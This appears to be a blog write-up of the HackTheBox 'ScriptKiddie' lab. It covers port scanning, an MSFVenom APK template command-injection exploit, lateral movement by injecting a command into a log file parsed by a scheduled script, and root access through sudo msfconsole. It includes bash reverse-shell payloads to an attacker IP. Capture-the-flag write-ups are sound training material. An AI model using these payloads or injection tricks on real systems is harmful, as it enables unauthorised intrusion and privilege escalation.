HackTheBox — ScriptKiddie

As always, we start with nmap to discover open ports/services.

Nmap scan

nmap -sC -sV -oA scriptkiddie 10.10.10.234

We have two open ports 22/ssh , 5000/http. Lets enumerate http port.

HTTP Enumeration

Visiting 10.10.10.226:5000 we see that the web application uses three tools (Nmap, MSFVenom, Searchsploit).

The first thing i tried is injecting OS commands in each field but nothing worked. Next i did some googling for public exploits for these tools and found APK template command injection vulnerability in MSFVenom.

There’s a module in metasploit that exploits this vulnerability but lets use this python script from exploitdb instead.

Exploit: https://www.exploit-db.com/exploits/49491

Wee need to edit the payload variable in the script first.

payload = 'bash -c "/bin/bash -i >& /dev/tcp/10.10.16.25/1337 0>&1"' 

Initial Foothold/User

Now lets run our netcat listener and run the exploit.

And we are on the box as kid user.

Lateral Movement

After some enumeration i found a script called scanlosers.sh inside pwn user home directory, we only have read permissions on it but i think the script is running regularly because the hackers file is cleared every few minutes. So lets understand the script to see how it works.

#!/bin/bash

log=/home/kid/logs/hackers

cd /home/pwn/
cat $log | cut -d' ' -f3- | sort -u | while read ip; do
sh -c "nmap --top-ports 10 -oN recon/${ip}.nmap ${ip} 2>&1 >/dev/null" &
done

if [[ $(wc -l < $log) -gt 0 ]]; then echo -n > $log; fi

It reads the hackers file inside our home directory, and then it splits the string inside by a space and takes the third field (which is the IP address) and runs Nmap scan on it.

And we have read/write permissions on hackers file so we can edit the file to get OS command injection.

Payload: echo "field1 field2 ;bash -c '/bin/bash -i >& /dev/tcp/10.10.16.25/1337 0>&1' #" > hackers

field1 & field2 are just for the cut command so we can inject our payload in the third field. And “;” to break out of the sh command and “#” to comment the rest of the command.

The final step is to run a netcat listener and receive the reverse shell nc -nvlp 1337 .

Getting root

Running sudo -l we can run metasploit’s msfconsole as root without password.

Metasploit’s msfconsole allows you to execute system commands within the msfconsole itself

sudo /opt/metasploit-framework-6-0-9/msfconsole

And we are ROOT !

If you find it useful, kindly give me a respect

Linkedin | Github

--

--

--

I am a Penetration Testing Enthusiast with computer science background, also interested in CTFs and python scripting.

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

The Secret To Stopping Pirates (And 3 More Lessons I Learned From Getting Ripped Off) —…

THESE ARE THE QUESTIONS TO ASK A COMPUTER….

Tips to increase iOS App Security

Everest granted additional rights by MFSA

The Lifespan of a Data Breach & the Attack Lifecycle

Global IT Security Leader Segurazo Highlights 7 Essential Online Security Tips

</ OverTheWire > Bandit Level 14 → Level 15

Big Data, Big Potential. But Whose?

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
0xEmbo

0xEmbo

I am a Penetration Testing Enthusiast with computer science background, also interested in CTFs and python scripting.

More from Medium

HackTheBox — Monitors

HTB: Conceal Writeup w/o Metasploit

Vulnhub: MoneyBox 1 Walkthrough

HTB: Driver